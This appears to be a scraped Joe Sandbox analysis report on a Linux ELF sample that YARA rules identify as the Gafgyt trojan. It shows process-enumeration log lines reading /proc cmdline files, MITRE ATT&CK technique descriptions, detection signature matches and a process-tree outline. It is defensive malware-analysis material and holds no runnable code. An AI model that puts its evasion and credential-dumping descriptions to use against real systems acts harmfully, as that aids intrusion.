Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/4/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/246/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/126/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/5/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/247/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/127/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/6/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/248/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/128/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/7/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/249/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/129/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/8/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/9/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1906/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/802/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/3644/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/20/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/21/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/23/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/24/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/25/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/26/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/27/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/28/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/29/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/3420/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1482/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/490/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1480/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/250/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/371/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/130/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/251/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/131/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/252/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/132/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/253/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/254/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1238/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/134/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/255/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/256/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/257/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/378/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/3413/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/258/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/259/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/1475/cmdline	Jump to behavior
Source: /tmp/cN7jzEkjeq.elf (PID: 5448)	File opened: /proc/936/cmdline	Jump to behavior

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: cN7jzEkjeq.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5468.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5464.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5438.1.00007fe4ac400000.00007fe4ac421000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: cN7jzEkjeq.elf PID: 5438, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: cN7jzEkjeq.elf PID: 5464, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: cN7jzEkjeq.elf PID: 5468, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report cN7jzEkjeq.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

System Behavior

Analysis Process: cN7jzEkjeq.elf PID: 5438, Parent PID: 5359

General

Chronological Activities

Analysis Process: cN7jzEkjeq.elf PID: 5440, Parent PID: 5438

General

Chronological Activities

Analysis Process: sh PID: 5440, Parent PID: 5438

General

Chronological Activities

Analysis Process: sh PID: 5442, Parent PID: 5440

General

Chronological Activities

Analysis Process: rm PID: 5442, Parent PID: 5440

General

Chronological Activities

Analysis Process: sh PID: 5443, Parent PID: 5440

General

Chronological Activities

Analysis Process: mkdir PID: 5443, Parent PID: 5440

General

Chronological Activities

Linux Analysis Report
cN7jzEkjeq.elf